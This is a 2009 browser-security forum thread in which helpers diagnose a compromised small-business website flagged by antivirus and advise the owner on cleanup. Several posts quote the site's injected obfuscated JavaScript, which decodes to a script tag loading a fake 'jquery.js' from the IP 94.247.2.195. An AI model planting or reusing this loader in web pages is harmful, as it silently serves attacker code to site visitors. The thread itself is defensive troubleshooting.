innovativelychallenged
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
innovativelychallenged
I get a NoScript warning saying below site has a virus.
http://www.innovativelychallenged.com
could it be statcounter script?
thanks.
http://www.innovativelychallenged.com
could it be statcounter script?
thanks.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Is this another of your websites?
How are you accessing http://www.innovativelychallenged.com/?
From a bookmark? From a Google search?
This is on your site:
How are you accessing http://www.innovativelychallenged.com/?
From a bookmark? From a Google search?
This is on your site:
Code: Select all
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: innovativelychallenged
I've never seen NoScript warning about a virus. I don't think it has that capability. "I get a NoScript warning saying below site has a virus." doesn't give us enough information to help you.
I've loaded that site in my Firefox NoScript test profile, using Sandboxie for safety, and see no problem. I'm not about to start randomly clicking links or changing NoScript settings in an attempt to figure out what you're talking about, informactive. I think you need to be a lot more specific, i.e. give exact steps to reproduce your issue and a full description of what you see.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
NoScript 1.9.2.3
I've loaded that site in my Firefox NoScript test profile, using Sandboxie for safety, and see no problem. I'm not about to start randomly clicking links or changing NoScript settings in an attempt to figure out what you're talking about, informactive. I think you need to be a lot more specific, i.e. give exact steps to reproduce your issue and a full description of what you see.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
NoScript 1.9.2.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I re uploaded index.html page and it seems to be okay now.
but what page did you find all this?
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
but what page did you find all this?
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
One the first page itself.
But I'm not sure when it showed up.
Originally when I looked through the source, I did not notice it. (I may <or may not> have noticed it.)
Since I didn't catch anything right off, I Allowed innovativelychallenged.com. (Late, tired, not sure what I did next or after?) But at some point I did get that code in the source.
Now sometimes these exploits log IP's so that you will only see it once. So the second time you go looking for it, it is hidden from you. As it appears to be from me now?
But I'm not sure when it showed up.
Originally when I looked through the source, I did not notice it. (I may <or may not> have noticed it.)
Since I didn't catch anything right off, I Allowed innovativelychallenged.com. (Late, tired, not sure what I did next or after?) But at some point I did get that code in the source.
Now sometimes these exploits log IP's so that you will only see it once. So the second time you go looking for it, it is hidden from you. As it appears to be from me now?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
Sorry it was not a NoScript warning it was an advast warning.
http://i255.photobucket.com/albums/hh13 ... 230131.gif
There is not a whole lot on any of these pages let along script other than Statcounter on index.html.
are you looking at page other than like source view?
thanks
http://i255.photobucket.com/albums/hh13 ... 230131.gif
There is not a whole lot on any of these pages let along script other than Statcounter on index.html.
are you looking at page other than like source view?
thanks
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
But if you changed the page source ... heh.
Read here, & pay particular attention to post#10, AVAST Forum: JS-Redirector-G [trj] warning.
And you are likely to find that code <again> on every one of your pages (& sub-pages).
It is on d577570.htm right now.
Only Sophos tagged it, even though they also scan with Avast: VirusTotal: File d577570.htm.VIR.htm
Read here, & pay particular attention to post#10, AVAST Forum: JS-Redirector-G [trj] warning.
And you are likely to find that code <again> on every one of your pages (& sub-pages).
It is on d577570.htm right now.
Only Sophos tagged it, even though they also scan with Avast: VirusTotal: File d577570.htm.VIR.htm
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I'm using expression web and this is all I see in my design of d577570.htm. Where is redirector script hiding?
I tried reading favicon.ico using notepad and nothing I could find looking like script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
I tried reading favicon.ico using notepad and nothing I could find looking like script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshed, that code, JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can than be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
Re: innovativelychallenged
This is what I get:
Code: Select all
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3369
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: innovativelychallenged
I don't get anything, even with avast installed.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Re: innovativelychallenged
Essentially the same, but ... the favicon, talked about in the link above, & the JavaScript exploit code itself.
<link rel="shortcut icon" href="favicon.ico"> === <link rel="shortcut icon" href="http://www.innovativelychallenged.com/favicon.ico">
(You may have to View Image to see it fully <at least as much as I captured>.)

<link rel="shortcut icon" href="favicon.ico"> === <link rel="shortcut icon" href="http://www.innovativelychallenged.com/favicon.ico">
(You may have to View Image to see it fully <at least as much as I captured>.)

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
Re: innovativelychallenged
Correction must be made by administrator/owner of the website avast alerts about.
Note that the Avast forum thread (above) is ongoing.Somewhere in your code is link to favicon which actualy doesnt exist. Server generates 404 message which is infected. Please check server generated messages.
First of all being secure doesn’t mean to just install firewalls, anti-viruses, ... This favicon and also XSS attacks fall into a category that can’t be handled by just installing few security tools. Reason their host/carriers through which they intrude into your system are common internet resources like web-pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the option left is to only allow the scripts from the resources you rely like Google & Yahoo (matter of choice). This is what NoScript and Request policy does. NoScript by default blocks all the flash and javascript content on the pages you visit unless you add them (more specifically website domain or address) to it’s whitelist. RequestPolicy goes one step ahead and blocks javascript content originating or communicating from the server you are not visiting on first place, even if it is in the whitelist. The fundamental thing is simple to block all the resources/communication outside the current resource you are browsing. For more details I would recommend you to read FAQs on NoScript & RequestPolicy websites.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090423 SeaMonkey/2.0b1pre
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
The Rube wins on this one.
I did a control F5 on each *.htm file and uploaded them all back to 1and1 and there is no Virus alert at any of them
Now that I see d577570.htm on my screen without Advast warning I go to view source and do not see script on that page below heading so I guess all is well.
I use http://www.diskcleaner.nl/ pretty much every day or so to clean up my cache. Is it missing files when it cleans or should I try another cache remover? I also clean with Firefox clean cache option under tools every other day or so.
thanks.
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshed, that code, JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can than be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
I did a control F5 on each *.htm file and uploaded them all back to 1and1 and there is no Virus alert at any of them
Now that I see d577570.htm on my screen without Advast warning I go to view source and do not see script on that page below heading so I guess all is well.
I use http://www.diskcleaner.nl/ pretty much every day or so to clean up my cache. Is it missing files when it cleans or should I try another cache remover? I also clean with Firefox clean cache option under tools every other day or so.
thanks.
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshed, that code, JavaScript code is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can than be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cash, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: innovativelychallenged
I went searching for a new cleaner and found
http://www.ccleaner.com/
and it found 60MB of files to clean. I cleaned them and fortunately my computer appears to still be functioning.
Perhaps ccleaner will do a better job of cleaning my cache if cleaning my cache had something to do with doing Control F5 on my site.
thanks.
http://www.ccleaner.com/
and it found 60MB of files to clean. I cleaned them and fortunately my computer appears to still be functioning.
Perhaps ccleaner will do a better job of cleaning my cache if cleaning my cache had something to do with doing Control F5 on my site.
thanks.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10